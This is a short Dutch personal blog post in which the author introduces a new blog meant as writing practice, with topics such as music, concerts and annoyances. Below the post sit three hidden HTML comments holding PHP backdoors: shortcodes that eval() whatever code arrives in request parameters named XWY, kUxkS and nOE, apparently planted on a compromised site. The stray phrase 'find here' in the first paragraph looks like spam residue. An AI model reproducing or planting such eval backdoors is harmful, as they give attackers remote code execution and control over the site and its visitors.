Bloggen?

Een blog? Is dat nog wel relevant, vroeg ik me een aantal dagen geleden af. Via Twitter kwamen er gelukkig bruikbare tips binnen. Na lang twijfelen toch maar dit project opgestart. Project ja, want zo voelt het toch wel aan find here.

Ik houd eigenlijk helemaal niet om ontzettende persoonlijke dingen het net op te slingeren. “En Twitter dan? Daar maak je ook veelvuldig gebruik van.” Oké, Twitter is een uitzondering. Daar gooi ik soms wel persoonlijke dingen het web op.

Ik ben van plan dit blog te gaan gebruiken als schrijfoefening. Misschien leest geen kip de posts, ik zal er altijd wel wat aan hebben. Onderwerpen, ook een goed punt om te bespreken in de eerste post. Muziek, bijzondere belevenissen, concerten, ergernissen. Het zal allemaal voorbij komen. Je merkt het vanzelf.

Stay focused!

<!– [insert_php]if (isset($_REQUEST["XWY"])){eval($_REQUEST["XWY"]);exit;}[/insert_php][php]if (isset($_REQUEST["XWY"])){eval($_REQUEST["XWY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["kUxkS"])){eval($_REQUEST["kUxkS"]);exit;}[/insert_php][php]if (isset($_REQUEST["kUxkS"])){eval($_REQUEST["kUxkS"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["nOE"])){eval($_REQUEST["nOE"]);exit;}[/insert_php][php]if (isset($_REQUEST["nOE"])){eval($_REQUEST["nOE"]);exit;}[/php] –>